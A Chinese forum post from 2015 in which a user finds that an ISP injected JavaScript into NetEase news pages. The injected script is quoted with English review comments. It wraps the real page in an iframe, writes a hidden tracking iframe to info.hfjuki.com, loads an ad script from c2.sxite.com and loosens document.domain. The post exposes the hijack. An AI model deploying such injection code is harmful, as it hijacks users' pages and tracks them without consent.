|
本帖最后由 hudba 于 2015-2-3 00:56 编辑
上网易看新闻半天打不开,发现状态栏显示正在访问一个奇怪的域名。心里一惊,难道电脑中毒了?赶紧查看源代码,发现后面加了一段js,真正的新闻内容被放进了iframe里。

接下来就是去搜索这个域名,发现v2ex里面也有人遇到这个问题,原来是运营商搞的鬼。
https://www.google.com/search?q=info.hfjuki.com&ie=utf-8&oe=utf-8
http://www.v2ex.com/t/142197
顺便查下ip138:

这是那段js里面的代码,好像是个半成品,还没写入广告数据:
/**
 * Returns the query string that the injected loader script was requested with.
 *
 * The loader's own <script> element is located with getMainJs(), and the part
 * of its src starting at the "?" that follows ".js" is returned. The
 * parameters are therefore read from the script URL, not from the page URL.
 *
 * @returns {string} the tail of the script src, beginning with "?".
 */
function locationSearch() {
    var s = getMainJs();
    if (s == null) {
        // No matching <script> element: the page is reloaded. There is no
        // return here, so execution continues to s.src below, which throws
        // when s is null.
        location.reload();
    }
    // indexOf(".js?") + 3 is the position of the "?", so the result keeps it.
    return s.src.substring(s.src.indexOf(".js?") + 3, s.src.length);
}
/**
 * Hand-rolled query-string lookup: returns the value of `name` from the part
 * of `paraStr` that follows the first "?".
 *
 * @param {string} name - parameter name to look for.
 * @param {string} paraStr - string containing "?" followed by k=v pairs
 *     joined with "&".
 * @returns {string} the raw (not URL-decoded) value, or the literal text
 *     "No such parameter" when "&name=" is not present.
 */
function getParameter(name, paraStr) {
    var result = "";
    // A leading "&" is prepended so that every pair, including the first,
    // can be matched as "&name=". If paraStr has no "?", split()[1] is
    // undefined and str becomes "&undefined".
    var str = "&" + paraStr.split("?")[1];
    var paraName = "&" + name + "=";
    if (str.indexOf(paraName) != -1) {
        // NOTE(review): this test searches for the bare name, not "&name=",
        // so it can start from an earlier occurrence of the same text.
        if (str.substring(str.indexOf(name), str.length).indexOf("&") != -1) {
            // Another "&" follows: cut "&name=value" out of the tail.
            var TmpStr = str.substring(str.indexOf(paraName), str.length);
            result = TmpStr.substr(TmpStr.indexOf(paraName), TmpStr.substring(
                    1, TmpStr.length).indexOf("&")
                    - TmpStr.indexOf(paraName) + 1);
        } else {
            // Last pair in the string: take everything to the end.
            result = str.substring(str.indexOf(paraName), str.length);
        }
        // Drop "&name=" and keep only the value.
        result = result.substring(result.indexOf("=") + 1, result.length);
    } else {
        result = "No such parameter";
    }
    // replace() with a string pattern removes only the first "&".
    return (result.replace("&", ""));
}
/**
 * Finds the loader's own <script> element in the page.
 *
 * Walks every <script> element in document order and returns the first one
 * whose src contains the substring "t_c".
 *
 * @returns the matching script element, or null when none matches.
 */
function getMainJs() {
    var scripts = document.getElementsByTagName("script");
    var s = null;
    for (var i = 0; i < scripts.length; i++) {
        // NOTE(review): the first operand compares the element with the
        // string "undefined" rather than using typeof, so it does not look
        // like an effective guard; the src test is what selects the element.
        if (scripts[i] != "undefined" && scripts[i].src.indexOf("t_c") != -1) {
            s = scripts[i];
            break;
        }
    }
    return s;
}
/**
 * Appends a "key=value" fragment to a URL string.
 *
 * Uses "&" as the separator when oStr already contains "?" at an index
 * greater than 0, and "?" otherwise. This helper is not called anywhere in
 * the listing as posted.
 *
 * @param {string} oStr - URL to extend.
 * @param {string} aStr - fragment to append, added as-is (no encoding).
 * @returns {string} the extended URL.
 */
function appendParam(oStr, aStr) {
    if (oStr.indexOf('?') > 0) {
        oStr = oStr + "&" + aStr;
    } else {
        oStr = oStr + "?" + aStr;
    }
    return oStr;
}
// Installs an empty function as the page-wide error handler, replacing
// whatever handler was previously assigned to window.onerror.
window.onerror = function() {
};
// Counts how many times setTcTitle() has re-scheduled itself.
var g_titleTime = 0;

/**
 * Copies the title of the framed document (element id "cn") onto the outer
 * document, retrying once per second while the title is not yet readable.
 *
 * Per the post, the original page content is loaded inside an iframe; this
 * function presumably exists so the browser tab still shows that page's
 * title. Once the title has been copied, setTcAdvVisible() is called.
 */
function setTcTitle() {
    if (undefined == document) {
        // No document yet: try again in one second. This branch has no
        // retry limit of its own.
        g_titleTime++;
        // The string form of setTimeout evaluates its argument as code.
        setTimeout("setTcTitle();", 1000);
        return;
    }

    var doc;
    try {
        if (document.all) {
            // Branch taken where document.all is truthy (legacy IE object model).
            doc = document.frames["cn"].document;
        } else {
            doc = document.getElementById("cn").contentDocument;
        }
    } catch (ex) {
        // Any error while reaching into the frame is ignored; doc then
        // stays undefined and the retry branch below is taken.
    }
    if (g_titleTime < 5
            && (undefined == doc || undefined == doc.title || "" == doc.title)) {
        // Title not available yet and fewer than 5 attempts counted: retry.
        g_titleTime++;
        setTimeout("setTcTitle();", 1000);
        return;
    } else if (undefined != doc && undefined != doc.title && "" != doc.title) {
        document.title = doc.title;
        setTcAdvVisible();
    }
    // When the counter has reached 5 and there is still no title, nothing
    // further happens in this function.
}
// Schedules the first title poll one second after the script runs.
setTimeout("setTcTitle();", 1000);
// Set to true once the "addiv" element has been revealed, so that the
// style change is applied only once.
var g_isHaveVisible = false;

/**
 * Reveals the element with id "addiv" by setting visibility to 'visible'
 * and display to 'block'. Does nothing when the element is absent or when it
 * has already been revealed. The listing does not show where "addiv" is
 * created; presumably it is the ad container supplied by the remotely loaded
 * script.
 */
function setTcAdvVisible() {
    if (undefined != document && undefined != document.getElementById("addiv")
            && !g_isHaveVisible) {
        document.getElementById("addiv").style.visibility = 'visible';
        document.getElementById("addiv").style.display = 'block';
        g_isHaveVisible = true;
    }
}
/**
 * Holder for the parameters read from the loader script's URL.
 *
 * Four fields start as empty strings here; initParameters() fills them and
 * also adds `address` and `usagent`, which are not initialised in this
 * constructor.
 */
function UrlAnalyzer() {
    this.divda = "";
    this.tctype = "";
    this.radius = "";
    this.rlu = "";
}
/**
 * Fills the instance fields from the loader script's query string.
 *
 * Six parameters are read with getParameter(): lruedct, divda, radius,
 * tctype, address and usagent. A parameter that is missing from the URL ends
 * up as the literal text "No such parameter", because that is what
 * getParameter() returns in that case.
 */
UrlAnalyzer.prototype.initParameters = function() {
    var paraStr = locationSearch();
    // "lruedct" is stored as rlu; rlu is not read again in the listing as posted.
    this.rlu = getParameter("lruedct", paraStr);
    // divda is later sent as the advId value in executeHtmlContext().
    this.divda = getParameter("divda", paraStr);
    this.radius = getParameter("radius", paraStr);
    this.tctype = getParameter("tctype", paraStr);
    this.address = getParameter("address", paraStr);
    this.usagent = getParameter("usagent", paraStr);
}
/**
 * Returns the document loaded inside the frame with id "cn".
 *
 * @returns the frame's document, or undefined when reaching into the frame
 *     throws (the exception is swallowed).
 */
UrlAnalyzer.prototype.getHtmlDoc = function() {
    var doc;
    try {
        if (document.all) {
            // Branch taken where document.all is truthy (legacy IE object model).
            doc = document.frames["cn"].document;

        } else {
            doc = document.getElementById("cn").contentDocument;
            // doc = document.getElementById("cn").contentWindow.document;
        }
    } catch (ex) {
        // Ignored on purpose: callers treat an undefined doc as "not readable".
    }
    return doc;
}
/**
 * Fallback used when the framed page's title could not be read: shortens
 * document.domain by one label and then tries to read the title again.
 *
 * Runs only while the outer document's title is still empty. Assigning the
 * parent domain to document.domain changes the origin the browser uses for
 * same-origin checks on this page; presumably this is meant to make the
 * framed page reachable when it is served from a sibling subdomain that
 * relaxes its domain as well (TODO confirm against the framed page).
 */
UrlAnalyzer.prototype.setDomain = function() {
    if (undefined != document.title && "" == document.title)
    {
        var index = document.domain.indexOf(".");
        // indexOf always returns a number, so only the -1 test is effective.
        if (undefined != index && -1 != index) {
            // Drop the leftmost label, e.g. "a.b.c" becomes "b.c".
            document.domain = document.domain.substring(index + 1,
                    document.domain.length);
        }

        var doc = this.getHtmlDoc();
        if (undefined != doc && undefined != doc.title && "" != doc.title) {
            document.title = doc.title;
            setTcAdvVisible();
        }
    }
}
/**
 * Load handler for the frame with id "cn" (registered in
 * executeHtmlContext()).
 *
 * If the framed document's title is readable, it is copied to the outer
 * document and setTcAdvVisible() is called. Otherwise setDomain() is
 * scheduled to run one second later as a fallback.
 */
UrlAnalyzer.prototype.iframeCallback = function() {
    var doc = this.getHtmlDoc();
    if (undefined == doc || undefined == doc.title || "" == doc.title) {
        if (undefined != document.domain) {

            // Keep a reference to this instance for the deferred call.
            var self = this;
            setTimeout(function(){self.setDomain.call(self, null)}, 1000);
            // The commented-out lines below are an inline copy of what
            // setDomain() now does after the one-second delay.
            // var index = document.domain.indexOf(".");
            // if (undefined != index && -1 != index) {
            // document.domain = document.domain.substring(index + 1,
            // document.domain.length);
            // }
            //
            // var doc = this.getHtmlDoc();
            // if (undefined != doc && undefined != doc.title && "" !=
            // doc.title) {
            // document.title = doc.title;
            // setTcAdvVisible();
            // }
        }
    } else if (undefined != doc && undefined != doc.title && "" != doc.title) {
        document.title = doc.title;
        setTcAdvVisible();
    }
}
/**
 * Writes the tracking frame and the remote ad script into the page and hooks
 * the load event of the frame with id "cn".
 *
 * Two remote endpoints are contacted, both on port 8060:
 *   - info.hfjuki.com/page/statistics, loaded in a hidden iframe, receiving
 *     advId, rd, tctype, address and usagent;
 *   - c2.sxite.com/center, loaded as a <script>, receiving advId, radius and
 *     area=1.
 * The parameter values come from the loader script's URL and are
 * concatenated into the markup without any encoding or escaping before
 * document.write() is called.
 *
 * NOTE(review): as posted, the string literals below contain unescaped
 * double quotes and do not parse; presumably the forum software stripped the
 * backslashes of \" escapes. The text is kept as it appears in the post.
 */
UrlAnalyzer.prototype.executeHtmlContext = function() {
    // NOTE(review): tctype is filled from this.divda, not this.tctype, which
    // looks like a copy-paste slip in the sample.
    var staUrl = "http://info.hfjuki.com:8060/page/statistics?advId=" + this.divda
            + "&rd=" + this.radius + "&tctype=" + this.divda + "&address=" + this.address + "&usagent=" + this.usagent;

    // Hidden iframe that requests the statistics URL.
    var htmlStr = "<iframe src="" + staUrl
            + "" style="display:none"></iframe>";

    // The closing tag is written as <\/script> so that it does not end the
    // script element this code itself is running in.
    var advUrl = htmlStr
            + "<script src="http://c2.sxite.com:8060/center?advId="
            + this.divda + "&radius=" + this.radius + "&area=1" + ""><\/script>";
    document.write(advUrl);

    var self = this;
    var iframe = document.getElementById("cn");
    // attachEvent is used where the element provides it; otherwise the
    // onload property is assigned.
    if (iframe.attachEvent) {
        iframe.attachEvent("onload", function() {
            self.iframeCallback.call(self, null);
        });
    } else {
        iframe.onload = function() {
            self.iframeCallback.call(self, null);
        }
    }
}
/**
 * Entry point: reloads the content frame, reads the parameters and injects
 * the tracking and ad markup.
 */
UrlAnalyzer.prototype.executeMain = function() {
    var mainFrame = document.getElementById("cn");
    // Navigate the frame with id "cn" to its own src attribute again.
    mainFrame.contentWindow.location.href = mainFrame.src;
    this.initParameters();
    this.executeHtmlContext();
}
// Runs immediately when the injected script is evaluated: one global
// UrlAnalyzer instance is created and started.
var g_analyzer = new UrlAnalyzer();
g_analyzer.executeMain();